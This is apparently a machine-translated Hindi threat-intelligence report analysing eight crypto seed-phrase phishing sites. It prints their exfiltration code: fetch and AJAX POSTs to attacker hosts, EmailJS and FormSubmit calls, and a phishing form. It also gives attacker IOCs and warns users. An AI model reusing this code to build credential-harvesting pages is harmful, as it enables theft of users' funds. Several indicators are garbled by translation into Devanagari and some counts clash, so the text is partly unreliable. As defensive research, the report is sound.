क्रिप्टो फ़िशिंग की संरचना:
8 वास्तविक हमलों का विश्लेषण
हमने लाइव फ़िशिंग ट्रैफ़िक को इंटरसेप्ट किया, 5 सीड फ़्रेज़ स्टीलर्स का रिवर्स-इंजीनियरिंग किया, और चोरी किए गए डेटा का पता टेलीग्राम बॉट्स, EmailJS खातों, और फ़िशिंग-एज़-ए-सर्विस बैकएंड्स तक लगाया।

हमने क्या पाया
हर दिन, हजारों क्रिप्टोकरेंसी उपयोगकर्ता अपनी फंड्स उन फ़िशिंग साइटों पर खो देते हैं जो वैध वॉलेट सेवाओं से अलग नहीं दिखतीं। लेकिन क्या होता है पीछे नकली "कनेक्ट वॉलेट" बटन? आपकी सीड फ़्रेज़ असल में कहाँ जाती है?
हमने 5 सक्रिय फ़िशिंग साइटों से लाइव HTTP ट्रैफ़िक इंटरसेप्ट किया, उनका पूरा सोर्स कोड डाउनलोड किया, और प्रत्येक डेटा एक्सफ़िल्ट्रेशन एंडपॉइंट को उसकी अंतिम मंज़िल तक ट्रेस किया। यह जांच आधुनिक क्रिप्टो फ़िशिंग की पूरी संरचना को उजागर करती है — उन सोशल इंजीनियरिंग तरकीबों से लेकर जो आपको अपना सीड फ़्रेज़ टाइप करने के लिए प्रेरित करती हैं, उस टेलीग्राम बॉट तक जो इसे रीयल-टाइम में हमलावर तक पहुंचाता है।
इस लेख में दिखाए गए सभी सीड वाक्यांश यादृच्छिक रूप से उत्पन्न परीक्षण डेटा हैं। इस जांच के दौरान कोई वास्तविक क्रेडेंशियल समझौता नहीं हुआ। सभी साइटों की रिपोर्ट उनके संबंधित होस्टिंग प्रदाताओं और दुरुपयोग विभागों को कर दी गई है।
सार्वभौमिक आक्रमण पैटर्न
अलग-अलग ब्रांडिंग और बैकएंड के बावजूद, सभी 8 फ़िशिंग साइटें का पालन करती हैं बिल्कुल वही मनोवैज्ञानिक फ़नल:
महत्वपूर्ण अंतर्दृष्टि: "कनेक्टिंग..." एनिमेशन हमेशा विफल होने के लिए हार्डकोड किया गयासाइट #4 के स्रोत कोड में, हमें मिला const success = false — वॉलेट कनेक्शन का कोई प्रयास नहीं है। यह पूरा प्रवाह केवल पीड़ितों को "मैन्युअली कनेक्ट करें" फॉर्म की ओर धकेलने के लिए मौजूद है।

8 स्थल: पूरा विवरण
भेषधारण
वॉलेट सत्यापन के लिए एक काल्पनिक "विकेंद्रीकृत प्रोटोकॉल"। विश्वसनीयता के लिए यह लाइव CryptoCompare प्राइस टिकर और वास्तविक ब्लॉकचेन एक्सप्लोरर्स (इथेरियम, BSC, पॉलीगॉन, एवलान्च, सोलैना, कार्डानो) के लिंक का उपयोग करता है। लैंडिंग पेज में 100+ वॉलेट लोगो और 3-चरणीय "प्रमाणीकरण" प्रक्रिया शामिल है।
द्वैध निकासी श्रृंखला
सबसे परिष्कृत बैकएंड 5 में से — हर चोरी की गई क्रेडेंशियल इसके माध्यम से भेजी जाती है दो स्वतंत्र चैनल एक साथ:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) ओएसआईएनटी निष्कर्ष
| सूचक | मूल्य |
|---|---|
| ठग का ईमेल | Bestgrace309@gmail.com |
| टेलीग्राम बॉट | @DewdropsTG_bot (आईडी: 7567323692) |
| टेलीग्राम प्राप्तकर्ता | @metatech2 (चैट आईडी: 7350941887) |
| बैकएंड | ईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉम |
| ईमेलजेएस सेवा | service_d5qigxs / template_7bqxeaa |
| छिपा हुआ डोमेन | लेयरचेन.इन (सीएफ ईमेल अस्पष्टता से) |
| भेजे गए संदेश | 1,824+ (टेलीग्राम मैसेज_id से) |
| डोमेन आयु | 2 दिन (TLS: 25 मार्च, 2026) |
हमलावर का ईमेल एक में पाया गया था। जावास्क्रिप्ट टिप्पणी अंदर config.js: // Bestgrace309@gmail.com. उन्होंने इसे तैनात करने से पहले हटाना भूल गए। इसके अतिरिक्त, टेलीग्राम रिले बैकएंड पूरी तरह से खुला है — कोई प्रमाणीकरण नहीं, कोई दर सीमा नहीं। क्लाउडफ्लेयर के डीकोड करके data-cfemail HTML में obfuscation, हमने एक छिपा हुआ ईमेल भी उजागर किया: support@layerschain.in, भारतीय और दक्षिण अफ्रीकी होस्टिंग अवसंरचना से जुड़ता हुआ।
भेषधारण
वास्तविक की एक पिक्सेल-परफेक्ट खरोंच एक्वालिब्रे (एक्ला) टोकन माइग्रेशन पृष्ठ। HTML में एक मेटाडेटा टैग है जो स्रोत प्रकट करता है: data-scrapbook-source="https://token.aqla.app/migration", 19 नवंबर, 2024 को समय-मुद्रित।
शून्य-कोड दृष्टिकोण
इस आक्रमणकारी को आवश्यकता है शून्य सर्वर-साइड कोड. फ़ॉर्म सीधे को पोस्ट करता है गैर-स्थिर — स्थिर साइटों के लिए एक वैध फॉर्म बैकएंड। हर सबमिशन को ठग के ईमेल पर भेज दिया जाता है। हमलावर का ईमेल है सोर्स कोड में कभी भी दिखाई नहीं देता.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: मुफ़्त। अन-स्टैटिक फ़ॉर्म्स: मुफ़्त। कोई डोमेन खरीदे नहीं गए। कोई सर्वर किराए पर नहीं लिए गए। कुल बुनियादी ढांचे की लागत: शून्य डॉलर.
भेषधारण
सबडोमेन में " शामिल हैसेफपाल— का एक जानबूझकर किया गया गलत वर्तनीकरण सेफपाल, एक लोकप्रिय हार्डवेयर वॉलेट। साइट 26 नकली समस्या श्रेणियों के साथ "ब्लॉकचेन वॉलेट सुधार" के रूप में प्रस्तुत होती है। यह चेन नामों (इथेरियम, बीएससी, पॉलीगॉन...) को एनिमेट करने के लिए टाइप्ड.जेएस और विश्वसनीयता के लिए लाइवकॉइनवॉच टिकर का उपयोग करती है।
वही किट, वही ऑपरेटर?
का उपयोग करता है बिल्कुल वही फ़िशिंग टेम्पलेट साइट #2 के रूप में:
समान connect.html, एकसमान wallets.html 60+ लोगो के साथ, वही अन-स्टैटिक बैकएंड (अलग फॉर्म आईडी — 6f1b82c3...da9943af). समान किट दृढ़ता से सुझाव देती है एक ऑपरेटर दोनों साइटें चला रहा है.
कोड में चेतावनी संकेत: "Privay Policy" (एक 'c' गायब), "seperated" (होना चाहिए "separated"), "Kestore" (एक 'y' गायब)। पासवर्ड फ़ील्ड का उपयोग करता है type="text" के बजाय type="password".
भेषधारण
के एक लगभग-परिपूर्ण क्लोन फ्लेयर नेटवर्क पोर्टल — एक वास्तविक लेयर-1 EVM ब्लॉकचेन, जिसमें FTSO और डेटा कनेक्टर प्रोटोकॉल शामिल हैं। यह 30+ इकोसिस्टम पार्टनर्स, नेविगेशन और ब्रांडिंग को प्रतिकृति करता है। फेविकॉन्स एक टाइपोस्क्वाट से लोड किए गए हैं: portal.flaremainet.com (mainnet से एक 'n' गायब है)।
Dual EmailJS रिडंडेंसी
एकमात्र साइट जो उपयोग कर रही है एक साथ दो अलग-अलग EmailJS खाते हटाए जाने के खिलाफ अतिरिक्त सुरक्षा के लिए:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) हर चोरी के लिए ईमेल विषय: "New Wallet Details from Flare".
HTML में शामिल हैं गूगल टैग मैनेजर (GTM-WX2D2TR), माइक्रोसॉफ्ट क्लैरिटी (j4bllybjkp), लुनियो पीपीसी सुरक्षा, और एक ट्विटर/एक्स विज्ञापन पिक्सेल. हमलावर भाग रहा है भुगतान विज्ञापन पीड़ितों को फ़िशिंग साइट पर ले जाने और बॉट क्लिकों को फ़िल्टर करने के लिए। यह कोई शौक नहीं है — यह एक वित्त पोषित अभियान है जिसमें एनालिटिक्स और विज्ञापन खर्च शामिल हैं।

भेषधारण
एक सामान्य "COIN NODE" / "Wallet Fix" सेवा (कोई विशिष्ट ब्रांड नहीं)। कॉपीराइट "Wallet Fix 2022" — यह किट टेम्पलेट कम से कम 4 साल पुराना है। छवियाँ होस्ट की गई हैं pumpeth.com (WordPress ऑन AWS).
फ़िशिंग-एज़-ए-सर्विस
सबसे चिंताजनक बैकएंड आर्किटेक्चर: एक यूयूआईडी-आधारित बहु-किरायेदार एपीआई:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... प्रत्येक ठग को अपना स्वयं का UUID एंडपॉइंट मिलता है। एक केंद्रीय ऑपरेटर API का रखरखाव करता है, अभियानों पर नज़र रखता है, और संभवतः चोरी किए गए धन का एक हिस्सा लेता है। यह है औद्योगिकीकृत क्रिप्टो चोरी — एक फ़िशिंग-एज़-ए-सर्विस मॉडल।
संबंधित अवसंरचना (अधिकांशतः निष्क्रिय)
| डोमेन | भूमिका | स्थिति |
|---|---|---|
| एपीआई.पल्सरेसॉल्व.कॉम | एक्सफिल्ट्रेशन एपीआई | एनएक्सडीओएमेन |
| वॉलेटइश्यूज़फिक्स.नेट | फ़ैविकॉन होस्ट | एनएक्सडीओएमेन |
| सिंकवॉलेट डॉट ऑनलाइन | लोगो होस्ट | एनएक्सडीओएमेन |
| पम्पैथ.कॉम | छवि सीडीएन | लाइव (एडब्ल्यूएस) |
बैकएंड बंद है, लेकिन फ्रंटएंड अभी भी लाइव है क्लाउडफ्लेयर पेजेज़ पर। यदि हमलावर पुनः पंजीकरण करता है pulseresolve.com, साइट तुरंत फिर से चालू हो जाती है।
भेषधारण
A दोहरा अभियान: एक सामान्य "समर्थन केंद्र" पर wallet-support-39n.pages.dev 15 नकली जारी श्रेणियों और 39 वॉलेट ब्रांडों के साथ, साथ ही एक पिक्सेल-परफेक्ट लेजर ऑनबोर्डिंग क्लोन पर ledger-recovery.support Replit पर होस्ट किया गया — डिवाइस मॉडल चयन, पिन सेटअप, और 24-शब्दों वाले सीड वाक्यांश ग्रिड के साथ वास्तविक BIP39 स्वतः-पूर्ति.
एंटी-स्कैनर C2 बैकएंड
वॉलेट सपोर्ट पेज चोरी किया गया डेटा को भेजता है api.uranustoken.org/log — क्लाउडफ्लेयर के पीछे एक कस्टम nginx/Ubuntu C2। बैकएंड जानबूझकर सभी GET अनुरोधों को ड्रॉप करता है (522 टाइमआउट लौटाता है), केवल POST पर प्रतिक्रिया करता है। इसका मतलब है कि URL स्कैनर, Google Safe Browsing क्रॉलर और सुरक्षा शोधकर्ता GET के साथ एंडपॉइंट को पिंग करने पर कुछ भी नहीं देखते — C2 निष्क्रिय प्रतीत होता है।
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} लेजर क्लोन Replit पर ही एक अलग Express.js बैकएंड चलाता है: POST /api/recovery-phrase एकत्र करना {deviceId, pin, phrase}. यह लौटता है 400 {"error":"Invalid data provided"} खराब इनपुट पर — यह पुष्टि करते हुए कि बैकएंड है जीना और सक्रिय रूप से सत्यापित करना चोरी किया गया डेटा।
ओएसआईएनटी निष्कर्ष
| सूचक | मूल्य |
|---|---|
| फ्रंटएंड (वॉलेट) | wallet-support-39n.pages.dev |
| फ्रंटएंड (लेजर) | लेजर-रिकवरी.सपोर्ट (34.111.179.208) |
| सी2 बैकएंड | एपीआई.उरानुस्टोकन.ऑर्ग → एनजीआईएनएक्स/1.24.0 उबंटू |
| सी2 आईपीज़ | 104.21.60.163 / 172.67.198.35 (क्लाउडफ्लेयर) |
| रिप्लिट सत्यापित करें | a43d3852-5304-47af-a61b-f0f6f3912736 |
| पंजीयक | Name.com (ledger-recovery.support) |
| तैनात | 9 जनवरी, 2026 (अंतिम-संशोधित हेडर) |
| तकनीकी ढांचा | रिएक्ट + वाइट + टेलविंड v4.1 + फ्रेमर मोशन |
466 KB का JS बंडल में शामिल है पूर्ण BIP39 शब्द सूची रियल-टाइम ऑटो-कम्प्लीट के लिए, "पासफ्रेज" के 67 संदर्भ, "मनोनोनिक" के 39। लेजर क्लोन पीड़ितों को बिल्कुल असली लेजर डिवाइस के समान ऑनबोर्डिंग फ्लो से गुज़रवाता है — इस पूरी जांच में सबसे विश्वसनीय फ़िशिंग पेज। apiKey कॉन्फ़िग में फ़ील्ड एक का सुझाव देती है मल्टी-टेनेंट PhaaS वास्तुकला.
भेषधारण
एक सामान्य "विकेंद्रीकृत लॉन्चपैड" के साथ 21 चारा श्रेणियाँ (स्टेकिंग, माइग्रेशन, केवाईसी, गिवअवे, पुरस्कार क्लेम, संपत्ति वसूली, प्री-सेल, एनएफटी मिंट, लॉक्ड खाते...) और 70+ वॉलेट ब्रांड्स — यह उन सबसे व्यापक वॉलेट सूचियों में से एक थी जिनका हमने सामना किया। स्पष्ट रूप से झलकने वाली टाइपो "Sychronize" (एक 'n' की कमी) नकली होने का भंडाफोड़ करती है।
फ़ॉर्मसबमिट Pipeline
उपयोग फ़ॉर्म सबमिट डॉट कॉ — एक वैध फॉर्म-से-ईमेल सेवा। एंडपॉइंट हैश a2cf4131f1a5d39453c7c183df96f86f यह ठग के ईमेल पते का MD5 है। हमने Gmail, Yahoo, Hotmail, ProtonMail, Yandex और Mail.ru पर सैकड़ों ईमेल पैटर्न को ब्रूट-फोर्स किया — कोई मेल नहींठग एक असामान्य या यादृच्छिक रूप से उत्पन्न ईमेल का उपयोग करता है।
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); ओएसआईएनटी निष्कर्ष
| सूचक | मूल्य |
|---|---|
| डोमेन | मेननेटप्रमाणीकरणऐप.पेजेस.डेव |
| फ़ॉर्म सबमिट हैश | a2cf4131f1a5d39453c7c183df96f86f |
| अभियान आईडी | डेप विकेंद्रीकृत |
| फ़ॉन्टावesome किट | bdc3291137 (किट #112310842, मुफ्त v6.7.2) |
| जेक्वेरी | 3.2.1 + 3.5.1 एक साथ लोड |
| बूटस्ट्रैप | सीएसएस 5.2.2 + जेएस 5.3.0-अल्फा1 (अनुपालनहीनता) |
फ़ॉन्टावesome किट bdc3291137 — FontAwesome इस किट आईडी के पीछे के खाते के मालिक की पहचान कर सकता है। अभियान टैग DAPP DECENTRALIZED एक ही FormSubmit हैश का उपयोग करके अन्य फ़िशिंग साइटों पर भी दिखाई दे सकता है। सीड वाक्यांश चुराने के बाद, एक नकली क्यूआर कोड और यादृच्छिक 7-अक्षर का संदर्भ कोड प्रदर्शित किया जाता है: "अपने अद्वितीय रेफ़ कोड के साथ एडमिन से संपर्क करें" — जांच करने के बजाय पीड़ितों को इंतजार में रखा जाता है।
भेषधारण
अज्ञात — फ्रंटएंड और बैकएंड दोनों ऑफ़लाइन हैं। पेलोड संरचना के आधार पर, यह एक क्रिप्टो वॉलेट सीड फ़्रेज़ स्टीलर था। क्लाउडफ्लेयर R2 सार्वजनिक बकेट (ऑब्जेक्ट स्टोरेज, पेज नहीं) एक है अच्छी तरह से प्रलेखित फ़िशिंग माध्यम 5,000+ दुर्भावनापूर्ण पृष्ठों की पहचान और Netskope द्वारा 61 गुना ट्रैफ़िक वृद्धि की सूचना के साथ।
स्क्रिप्ट किडी सेटअप
सबसे अधिक मूलभूत क्रिया इस संग्रह में। सीड वाक्यांश भेजे जाते हैं। शब्द-शब्द मुफ्त डायनामिक डीएनएस के पीछे एक होम कंप्यूटर या वीपीएस पर चलने वाली एक PHP स्क्रिप्ट:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access ओएसआईएनटी निष्कर्ष
| सूचक | मूल्य |
|---|---|
| फ्रंटएंड | pub-519769e9eb634616b1746c2018641d56.r2.dev [ऑफ़लाइन] |
| बैकएंड | दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम [एनवाईडीोमेन] |
| आर2 बकेट आईडी | 519769e9eb634616b1746c2018641d56 |
| डीडीएनएस प्रदाता | DNSExit.com / नेटडॉर्म, इंक. (सिनसिनाटी, ओहायो) |
| डीएनएस एनएस | ns10–13.dnsexit.com |
| उपयोगकर्ता नाम | दयालुजिग्गावास्तविक123 |
"दयालु" + "जिगा" (जे-ज़ेड का उपनाम) + "4real" + "123" — एक विशिष्ट रूप से व्यक्तिगत हैंडल जो हिप-हॉप संस्कृति के प्रति लगाव को दर्शाता है। नहीं मिला किसी भी इंडेक्स्ड प्लेटफ़ॉर्म पर: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, या Steam। संभवतः Discord, Telegram, या गेमिंग प्लेटफ़ॉर्म पर इस नाम या इसके निकट समान नामों के तहत सक्रिय। फ़ाइल का नाम fuc.php हैंडल की बेबाक शैली से मेल खाता है।
आपके सीड फ़्रेज़ को चुराने के 7 तरीके

| विधि | साइटें | यह कैसे काम करता है | गति | लागत |
|---|---|---|---|---|
| टेलीग्राम बॉट | #1 | Render.com पर Express.js Bot API को प्रॉक्सी करता है। ठग को क्रेडेंशियल्स के साथ तुरंत डीएम मिलता है। | वास्तविक समय | $0 |
| ईमेलजेएस | #1, #4 | क्लाइंट-साइड जावास्क्रिप्ट सीधे EmailJS API को भेजता है, जो ठग के ईमेल पर भेजता है। | लगभग 1 मिनट | $0 |
| गैर-स्थिर फ़ॉर्म | #2, #3 | मानक HTML फ़ॉर्म POST एक वैध फ़ॉर्म सेवा को जो सबमिशन को ईमेल के माध्यम से अग्रेषित करती है। | लगभग 1 मिनट | $0 |
| फ़ॉर्म सबमिट डॉट कॉ | #7 | jQuery AJAX से FormSubmit.co तक। ईमेल पता MD5 हैश के पीछे छिपा हुआ है। अभियान को "DAPP DECENTRALIZED" के रूप में टैग किया गया है। | लगभग 1 मिनट | $0 |
| कस्टम C2 एपीआई | #6 | React SPA Cloudflare के पीछे nginx/Express API को भेजता है। ड्रॉप्स GET अनुरोध (522) स्कैनरों से बचने के लिए। केवल POST पर प्रतिक्रिया करता है। | वास्तविक समय | ~$5/माह |
| PHP + डीडीएनएस | #8 | नि:शुल्क डायनामिक डीएनएस (publicvm.com) के माध्यम से घरेलू कंप्यूटर पर PHP स्क्रिप्ट। सीड वाक्यांश शब्द-दर-शब्द भेजा गया। | वास्तविक समय | $0 |
| पीएचएएस एपीआई | #5 | UUID-आधारित बहु-किरायेदार API। केंद्रीय ऑपरेटर बैकएंड का प्रबंधन करता है, धोखेबाज एंडपॉइंट किराए पर लेते हैं। | वास्तविक समय | अज्ञात |
7 चेतावनी संकेत जो हर फ़िशिंग साइट का भंडाफोड़ करते हैं
अगर आप देखते हैं कोई भी इनमें से, टैब को तुरंत बंद करें:
वास्तविक वॉलेट कनेक्शन WalletConnect प्रोटोकॉल या ब्राउज़र एक्सटेंशन का उपयोग करते हैं। वे कभी भी "कनेक्शन विफल" त्रुटि नहीं दिखाते जिसमें आपसे अपना सीड वाक्यांश टाइप करने के लिए कहा जाए।
हर वॉलेट आइकन एक ही फॉर्म पर ले जाता है। एक वास्तविक सेवा प्रत्येक वॉलेट के असली SDK को एकीकृत करेगी।
सबमिट करने के बाद दिखाया जाने वाला नकली "503 त्रुटि" या "अज्ञात त्रुटि" जानबूझकर किया गया है। आपका डेटा पहले ही चुरा लिया गया था — यह त्रुटि आपको दूसरे वॉलेट के साथ फिर से प्रयास करने के लिए धोखा देती है।
सभी 5 साइटें Cloudflare Pages के मुफ्त स्तर का दुरुपयोग करती हैं। पहचान सत्यापन की आवश्यकता नहीं है। Cloudflare Pages पर फ़िशिंग दुरुपयोग 2025 में 198% बढ़ गया।
कोई भी वैध सेवा को इन तीनों प्रमाण-पत्र प्रकारों की आवश्यकता नहीं होती। यह ट्रिपल-टैब फॉर्म एक फ़िशिंग किट का हस्ताक्षर है।
इनमें से कोई भी साइट लोड नहीं हो रही है। ethers.js, web3.js, या कोई RPC कॉल करें। ये शुद्ध HTML फॉर्म हैं जो dApps होने का दिखावा कर रहे हैं।
मुफ्त होस्टिंग + मुफ्त फॉर्म सेवाएँ + मुफ्त संदेश सेवा = $0 में एक पूरा फ़िशिंग ऑपरेशन। यदि साइट का कोई वास्तविक डोमेन नहीं है, तो संदेह करें।
पूर्ण IOC तालिका
सुरक्षा टीमों, खतरे की खुफिया जानकारी प्लेटफ़ॉर्मों, और दुरुपयोग रिपोर्ट करने वालों के लिए:
डोमेन और अवसंरचना
| डोमेन | प्रकार | स्थिति |
|---|---|---|
| नेटवर्कलेयर्स.पेजेस.डेव | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| token-aqla.pages.dev | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| antiresolve-mysafpalnode.pages.dev | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| flaremainnet.pages.dev | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| swiftauthapps.pages.dev | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| ईमेलजेएस-बैकएंड-ओवीटीजी.ऑनरेंडर.कॉम | टीजी रिले बैकएंड | प्रत्यक्ष |
| पोर्टल.फ्लैरमेननेट.कॉम | टाइपोस्क्वाट संपत्तियाँ | अज्ञात |
| लेयरचेन डॉट इन | संबंधित डोमेन | डीएनएस बंद |
| एपीआई.पल्सरेसॉल्व.कॉम | पीएचएएस बैकएंड | एनएक्सडीओएमेन |
| वॉलेटइश्यूज़फिक्स.नेट | संपत्ति होस्ट | एनएक्सडीओएमेन |
| सिंकवॉलेट डॉट ऑनलाइन | लोगो होस्ट | एनएक्सडीओएमेन |
| पम्पैथ.कॉम | छवि सीडीएन | लाइव (एडब्ल्यूएस) |
| wallet-support-39n.pages.dev | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| लेजर-रिकवरी.सपोर्ट | लेजर फ़िशिंग (रिप्लिट) | प्रत्यक्ष |
| एपीआई.उरानुस्टोकन.ऑर्ग | C2 बैकएंड (एनजीआईएनएक्स/उबंटू) | प्रत्यक्ष |
| यूरेनस टोकन डॉट ओआरजी | मूल डोमेन | 404 |
| मेननेटप्रमाणीकरणऐप.पेजेस.डेव | फ़िशिंग फ्रंटएंड | प्रत्यक्ष |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | फ़िशिंग (R2 बकेट) | ऑफ़लाइन |
| दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम | PHP बैकएंड (डीडीएनएस) | एनएक्सडीओएमेन |
खाते और पहचानकर्ता
| प्रकार | मूल्य | साइट |
|---|---|---|
| ईमेल | Bestgrace309@gmail.com | #1 |
| ईमेल (छिपा हुआ) | support@layerschain.in | #1 |
| टेलीग्राम बॉट | @DewdropsTG_bot (7567323692) | #1 |
| टेलीग्राम उपयोगकर्ता | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| ईमेलजेएस #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| ईमेलजेएस #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| गैर-स्थिर फ़ॉर्म | c78173e2d991...94c3f76 | #2 |
| गैर-स्थिर फ़ॉर्म | 6f1b82c3ce55...da9943af | #3 |
| PhaaS यूयूआईडी | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| जीटीएम | जीटीएम-डब्ल्यूएक्स2डी2टीआर | #4 |
| एमएस क्लैरिटी | जे4ब्लिबीजेकेपी | #4 |
| रेंडर उदाहरण | आरएनडीआर-आईडी: ed83576e-b1b3-4c82 | #1 |
| रिप्लिट सत्यापित करें | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| फ़ॉर्म सबमिट एमडी5 | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| अभियान टैग | डेप विकेंद्रीकृत | #7 |
| फ़ॉन्टावesome किट | bdc3291137 (किट #112310842) | #7 |
| आर2 बकेट आईडी | 519769e9eb634616b1746c2018641d56 | #8 |
| यूज़रनेम/डीडीएनएस | दयालुजिग्गावास्तविक123 | #8 |
क्रिप्टो फ़िशिंग की रिपोर्ट कहाँ करें

| सेवा | क्या रिपोर्ट करें | कैसे |
|---|---|---|
| क्लाउडफ्लेयर | 7x .pages.dev + 1x R2 बकेट | दुरुपयोग.क्लाउडफ्लेयर.कॉम |
| गूगल सुरक्षित ब्राउज़िंग | सभी फ़िशिंग यूआरएल | फ़िश की रिपोर्ट करें |
| फ़िशटैंक | समुदाय ब्लैकलिस्ट के लिए सभी यूआरएल | फिशटैंक.ऑर्ग |
| ईमेलजेएस | 3 दुरुपयोग किए गए खाते (उपरोक्त सेवा आईडी) | abuse@emailjs.com |
| गैर-स्थिर | 2 फॉर्म एंडपॉइंट्स | un-static.com के माध्यम से संपर्क करें |
| रेंडर डॉट कॉम | टेलीग्राम रिले बैकएंड | दुरुपयोग फॉर्म प्रस्तुत करें |
| टेलीग्राम | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| गूगल (जीमेल) | Bestgrace309@gmail.com | Google दुरुपयोग रिपोर्ट |
| ट्विटर/एक्स | विज्ञापन खाता साइट #4 का प्रचार कर रहा है | X विज्ञापनों दुरुपयोग रिपोर्ट |
| फ़ॉर्म सबमिट डॉट कॉ | हैश a2cf4131... (#7) | फ़ॉर्म सबमिट दुरुपयोग फ़ॉर्म |
| रिप्लिट | लेजर-रिकवरी.सपोर्ट (#6) | रिप्लिट दुरुपयोग रिपोर्ट |
| नाम.कॉम | ledger-recovery.support के लिए रजिस्टर करें | Name.com दुरुपयोग |
| डीएनएसएक्जिट | दयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम | dnsexit.com दुरुपयोग |
| फ़ॉन्टावesome | किट bdc3291137 (#7) | फ़ॉन्टावesome दुरुपयोग |
| चेनअभ्यूस | सभी फ़िशिंग अभियान | चीनअत्याचार.कॉम |
खुद को कैसे सुरक्षित रखें
कोई भी वैध सेवा कभी भी आपसे अपनी सीड फ़्रेज़ वेबसाइट में टाइप करने के लिए नहीं कहेगी। सीड फ़्रेज़ केवल वॉलेट रिकवरी के दौरान आधिकारिक वॉलेट सॉफ़्टवेयर में ही डाले जाते हैं — कभी भी तीसरे पक्ष की "प्रमाणीकरण", "सिंक्रोनाइज़ेशन", या "रिकवरी" वेबसाइटों पर नहीं।
किसी भी वॉलेट को कनेक्ट करने से पहले:
- यह सत्यापित करें कि URL आधिकारिक डोमेन से मेल खाता है। SSL प्रमाणपत्र का विवरण जांचें।
- असली WalletConnect QR कोड या डीप लिंक का उपयोग करता है — कभी भी सीड फ़्रेज़ फ़ॉर्म का नहीं।
- यदि "कनेक्शन विफल" हो जाए और आपसे मैन्युअल रूप से क्रेडेंशियल दर्ज करने के लिए कहा जाए — तो यह फ़िशिंग है।
- संदिग्ध यूआरएल की जाँच करें फ़िशटैंक या वायरसटोटल संवाद करने से पहले।
- हार्डवेयर वॉलेट का उपयोग करें — यह प्रत्येक लेनदेन के लिए भौतिक पुष्टि की आवश्यकता होती है।
- आधिकारिक यूआरएल को बुकमार्क करें। विज्ञापनों, डीएम या सोशल मीडिया से आने वाले लिंक पर कभी क्लिक न करें।
क्रिप्टो फ़िशिंग वर्गीकरण
सीड फ़्रेज़ चोर केवल एक श्रेणी हैं। यहाँ क्रिप्टो फ़िशिंग का पूरा परिदृश्य है — हम प्रत्येक प्रकार में गहन विश्लेषण जोड़ेंगे।
असहज सत्य
क्रिप्टो फ़िशिंग ऑपरेशन स्थापित करने की लागत $0 और लेता है 30 मिनट से कम. मुफ्त होस्टिंग, मुफ्त फॉर्म सेवाएँ, मुफ्त मैसेजिंग बॉट्स। साइट #1 के पीछे का हमलावर पहले ही से क्रेडेंशियल्स इकट्ठा कर चुका है १,८२४+ पीड़ित. साइट #4 चल रही है भुगतान विज्ञापन मापने के लिए। यह शौकिया समय नहीं है — यह एक उद्योग है। एकमात्र रक्षा जागरूकता है।
हमारी लड़ाई में हमारा साथ दें
PhishDestroy क्रिप्टो फ़िशिंग साइटों को रीयल-टाइम में ट्रैक और रिपोर्ट करता है। यदि आप किसी संदिग्ध साइट का सामना करते हैं, तो हमें रिपोर्ट करें — हम इसकी जांच करेंगे और उसे बंद कराने के लिए काम करेंगे।



